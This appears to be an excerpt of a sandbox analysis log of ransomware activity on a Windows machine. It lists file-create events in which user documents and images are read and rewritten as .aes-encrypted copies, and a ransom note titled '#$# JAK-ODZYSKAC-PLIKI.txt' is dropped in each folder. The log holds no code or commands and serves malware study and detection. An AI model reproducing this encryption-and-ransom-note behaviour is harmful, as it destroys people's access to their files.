| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\TWIwOWOOuJkW1 zw.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\x4gPVtjMaNPIjOUfG-lC.doc | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\x4gPVtjMaNPIjOUfG-lC.doc.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\0kc5Nr5.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\0kc5Nr5.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\9oIEfcy.csv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\9oIEfcy.csv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\A2yHS.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\A2yHS.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\JjJMV9taw3HHVo.ods | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\JjJMV9taw3HHVo.ods.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\Okb6cH9a4iQrI_jw.csv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\Okb6cH9a4iQrI_jw.csv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\PNXTgcQo4yh5r.odt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\PNXTgcQo4yh5r.odt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\31C8Jf9y_xli.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\31C8Jf9y_xli.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\4MQNX-qcbrpg7.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\4MQNX-qcbrpg7.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\aOniMexN t.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\aOniMexN t.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\BcAtcIc FCi96Kikr19.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\BcAtcIc FCi96Kikr19.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\bdVwr.doc | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\bdVwr.doc.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\D-4thVUMdh.csv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\D-4thVUMdh.csv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Ev0YlMk5921.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Ev0YlMk5921.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\FbmlDMOUw-TzOy_UnN7.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\FbmlDMOUw-TzOy_UnN7.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\gXfWKSuNYtgFj.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\gXfWKSuNYtgFj.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\HHx-9RKiMuPSNON0eJb.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\HHx-9RKiMuPSNON0eJb.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\lcPTyHQE.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\lcPTyHQE.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\m-puIO0ZGGG_DdsrzN.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\m-puIO0ZGGG_DdsrzN.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\nfjvj4.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\nfjvj4.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\q7IKH0zTPGa.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\q7IKH0zTPGa.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Qis2t0idI.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Qis2t0idI.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\RLtENk6-mjNOz-raUF3v.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\RLtENk6-mjNOz-raUF3v.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\u5X9.ppt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\u5X9.ppt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\WffPHgzW1qt5nuBKPq.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\WffPHgzW1qt5nuBKPq.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Zb6u3g7h.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\Zb6u3g7h.xlsx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\-fs-R5u50BfKvf.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\-fs-R5u50BfKvf.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\Z3txdNfa.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\Z3txdNfa.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\3wLGR0fUmkcND1.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\3wLGR0fUmkcND1.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\8hsXLmZ5FCCheFKC.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\8hsXLmZ5FCCheFKC.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\pR 2s.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\pR 2s.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\2mLpi.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\2mLpi.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\JP-9xm1BMM.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\JP-9xm1BMM.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\M8qmIADbo6Rfghx.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\M8qmIADbo6Rfghx.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\_g8EG0.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\_g8EG0.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\C7FcN8b.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\C7FcN8b.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\dhn.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\dhn.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\HLuFP.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\HLuFP.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\hy7xiC9tP5aFULp5TBa.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\hy7xiC9tP5aFULp5TBa.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\ljSzdoYLTSvld u.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\ljSzdoYLTSvld u.jpg.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\MEtsfgADG8jkpvQ.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\MEtsfgADG8jkpvQ.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\QB7s9AH4L3t.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\QB7s9AH4L3t.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\btMvVnX CFKn1XV99U44.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\btMvVnX CFKn1XV99U44.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\c WNWiE5.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\c WNWiE5.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\ZFDojVkI.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\ZFDojVkI.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\-4w-q4wd1z.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\-4w-q4wd1z.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\FS30OROMoJdbC.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\FS30OROMoJdbC.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\KFh DlKG2stAGLP.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\KFh DlKG2stAGLP.jpg.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\kvHYSDZaY9p7NO8Z735z.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\kvHYSDZaY9p7NO8Z735z.png.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\pFfH.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w\pFfH.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\HJ3HCKNndjhrdYoB.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\HJ3HCKNndjhrdYoB.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\IQ814T.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\IQ814T.jpg.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\S-t1dx_AJ3.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\S-t1dx_AJ3.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\e8B06t5z\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\4Nz6FD 37UMclhfq6.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\4Nz6FD 37UMclhfq6.gif.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\dXFMoRUEzqjI.bmp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\dXFMoRUEzqjI.bmp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Pictures\IjyzG07WaZVWa6FxqH0.gif | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
